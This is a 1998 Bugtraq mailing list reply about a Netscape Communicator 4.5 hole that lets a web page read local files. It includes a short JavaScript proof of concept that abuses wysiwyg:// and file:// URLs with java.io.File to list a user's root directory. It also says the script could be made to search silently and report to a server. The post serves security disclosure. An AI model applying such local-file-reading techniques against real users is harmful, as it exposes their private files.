Bugtraq mailing list archives
Re: Netscape Communicator 4.5 can read local files
From: haddock () UDEL EDU (Terence Christopher Haddock)
Date: Wed, 25 Nov 1998 15:28:45 -0500
This security hole is not limited to knowing a specific file name, it can be used to list the contents of a directory, which I believe is much more insidious. This script can send a list of the files in the user's root directory under windows: sl=window.open("wysiwyg://1/file://C|/"); sl2=sl.window.open(); sl2.location="javascript:"+ "b=\"Here is the files in your root directory:\";"+ "var f=new java.io.file(\"C:\\\\\");"+ "var files=f.list();"+ "for (var x=0;x<files.length;x++){"+ "b+=files[x]+\"\n\""+ "};"+ "alert(b);"; (Simple to modify it for UNIX) Using a search algorithm the script could search for specific files by running this recursively. The only problem (from a hacker's perspective, a good thing from our perspective) is all of the windows it would open. If a way could be worked around this (which I think it can), this script could run without a user even knowing it, searching the user's directories and reporting them to a server. Sincerely, Terence C. Haddock On Wed, 25 Nov 1998, Ben Collins wrote:
Seems I was proven seriously wrong, *swallows pride*. Only limitations I see is that you do have to know the file name and path contrary to the original post, and as stated by the person who conducted the test, it is platform specific (he had to change it to work on this unix system). Not trying to dilute the problem, just noting some things. Apologies for the error in my statements, but isn't it much nicer to see it _really_ work? -- ----- -- - -------- --------- ---- ------- ----- - - --- -------- Ben Collins <b.m.collins () larc nasa gov> Debian GNU/Linux UnixGroup Admin - Jordan Systems Inc. bcollins () debian org ------ -- ----- - - ------- ------- -- The Choice of the GNU Generation
Current thread:
- Re: Netscape Communicator 4.5 can read local files, (continued)
- Re: Netscape Communicator 4.5 can read local files GNSS Research Division (Nov 23)
- Re: Netscape Communicator 4.5 can read local files Bill Lavalette (Nov 23)
- Re: Netscape Communicator 4.5 can read local files Andrew McNaughton (Nov 24)
- Re: Netscape Communicator 4.5 can read local files The Spirit of the Black Panther (Nov 23)
- Re: Netscape Communicator 4.5 can read local files Ryan Russell (Nov 24)
- Re: Netscape Communicator 4.5 can read local files Ben Collins (Nov 25)
- APC PowerNet SNMP Adapter Security Issues - Beta Firmware Paul Mansfield (Nov 25)
- Re: Netscape Communicator 4.5 can read local files Pavel Kankovsky (Nov 25)
- Re: Netscape Communicator 4.5 can read local files Terence Christopher Haddock (Nov 25)
- Re: Netscape Communicator 4.5 can read local files Ben Collins (Nov 25)
- Re: Netscape Communicator 4.5 can read local files Terence Christopher Haddock (Nov 25)
- XFree86 3.3.3 Released Aleph One (Nov 25)
- Re: Netscape Communicator 4.5 can read local files Trev (Nov 25)
- Re: Netscape Communicator 4.5 can read local files Ben Collins (Nov 25)
- Re: Netscape Communicator 4.5 can read local files kpm (Nov 25)
- Re: Netscape Communicator 4.5 can read local files Sven Carstens (Nov 25)
- Re: Netscape Communicator 4.5 can read local files Michael Teichmann (Nov 26)
- Re: Netscape Communicator 4.5 can read local files Trev (Nov 27)
- Java Redirect Bug - Netscpape 4.0[678] and 4.5 Keith Woodard (Nov 27)
- ipfwadm has pseudo-DoS ;) Domas Mituzas (Nov 28)
- Debian: Security flaw in FSP Vanja Hrustic (Nov 28)
- Debian: Security flaw in FSP David Damerell (Nov 30)